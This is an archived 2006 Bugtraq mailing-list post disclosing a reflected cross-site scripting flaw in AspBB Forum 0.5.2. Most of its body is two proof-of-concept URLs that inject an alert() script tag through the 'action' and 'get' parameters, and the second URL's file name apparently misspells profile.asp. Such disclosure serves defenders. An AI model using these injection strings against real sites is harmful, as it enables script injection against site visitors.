lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <BAY118-F25FD26B5B3074B56EF2D81C4A60@phx.gbl>
Date: Thu, 18 May 2006 10:37:53 +0000
From: "TeufeL Online" <teufel@...mail.com>
To: bugtraq@...urityfocus.com
Subject: AspBB Forum "profile.asp & default.asp"  XSS Vulnerability


This xss works on Aspbb Forums

Homapage : http://www.aspbb.org

Version : 0.5.2


Exploit:

http://www.example.com/default.asp?action="><script>alert('Xss 
Vulnerability');</script>

http://www.example.com/profila.asp?get="><script>alert('Xss 
Vulnerability');</script>&URL=%2FDefault%2Easp%3F

TeufeL // Netkabus.Com  Research And Develop Group

_________________________________________________________________
Real-time chat with your friends - Free download - MSN Messenger  
http://messenger.msn.com/?mkt=tr

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ